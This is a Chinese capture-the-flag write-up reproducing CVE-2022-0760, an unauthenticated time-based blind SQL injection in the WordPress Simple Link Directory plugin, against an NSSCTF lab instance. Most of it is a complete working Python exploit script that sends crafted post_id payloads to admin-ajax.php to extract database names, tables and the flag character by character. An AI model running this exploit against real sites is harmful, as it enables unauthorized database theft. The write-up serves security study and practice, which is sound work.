CVE-2022-0760 漏洞复现

CVE-2022-0760

NSS [HNCTF 2022 WEEK2]ohmywordpress

【CVE-2022-0760】

题目描述:flag在数据库里面。

开题:

顺着按钮一直点下去会发现出现一个按钮叫安装WordPress

安装完之后的界面,有一个搜索框。

F12看看network。

又出现了这个WordPress,从源码中看出版本是6.0.2

网上一番搜索,找到一个cve,CVE-2022-0760。当WordPress的插件Simple Link Directory版本 < 7.7.2时候存在时间盲注。

查看源码,这里确实运用的这个插件,但是看不到版本。

估计就是这个CVE,那就直接上盲注脚本。

python 复制代码
import requests
import time


url = "http://node5.anna.nssctf.cn:28982/wp-admin/admin-ajax.php"

result = ""
for i in range(1, 100):
    length = len(result)
    for o in range(32, 128):

        data = {
            "action": "qcopd_upvote_action",
            # "post_id": f"(SELECT 3 FROM (select if(ascii(substr((select group_concat(schema_name) from information_schema.schemata),{i},1))={o},sleep(3),0))enz)",
            # "post_id": f"(SELECT 3 FROM (select if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=substr((select group_concat(schema_name) from information_schema.schemata),26,11)),{i},1))={o},sleep(3),0))enz)",
            "post_id": f"(SELECT 3 FROM (select if(ascii(substr((select group_concat(a) from (select 1 as a union select * from ctftraining.flag)b),{i},1))={o},sleep(3),0))enz)",
        }

        time1 = time.time()

        res = requests.post(url, data=data)

        time2 = time.time()

        # print(time2 - time1)
        # exit()

        if time2 - time1 > 3:
            result += chr(o)
            print(result)
            break

    if len(result) == length:
        break

为什么这样写脚本,漏洞利用在下面文章里面能找到。

参考文章:

NSFOCUS绿盟科技

Simple Link Directory \< 7.7.2 - Unauthenticated SQL injection WordPress Security Vulnerability (wpscan.com)\](

相关推荐
北极光SD-WAN组网1 小时前
工业互联网时代,如何通过混合SD-WAN提升煤炭行业智能化网络安全
网络·安全·web安全
落鹜秋水3 小时前
Cacti命令执行漏洞分析(CVE-2022-46169)
web安全·网络安全
pencek5 小时前
XCTF-crypto-幂数加密
网络安全
会议之眼5 小时前
截稿倒计时 TrustCom‘25大会即将召开
网络安全
周先森的怣忈6 小时前
渗透高级-----测试复现(第三次作业)
网络安全
MUY09906 小时前
OSPF之多区域
网络·网络安全
未来之窗软件服务7 小时前
网站访问信息追踪系统在安全与性能优化中的关键作用——网络安全—仙盟创梦IDE
安全·web安全·性能优化·仙盟创梦ide·东方仙盟
介一安全13 小时前
【Web安全】逻辑漏洞之URL跳转漏洞:原理、场景与防御
安全·web安全·安全威胁分析·安全性测试·逻辑漏洞·url跳转
希望奇迹很安静14 小时前
文件包含学习总结
安全·web安全·渗透测试学习
波吉爱睡觉14 小时前
文件解析漏洞大全
web安全·网络安全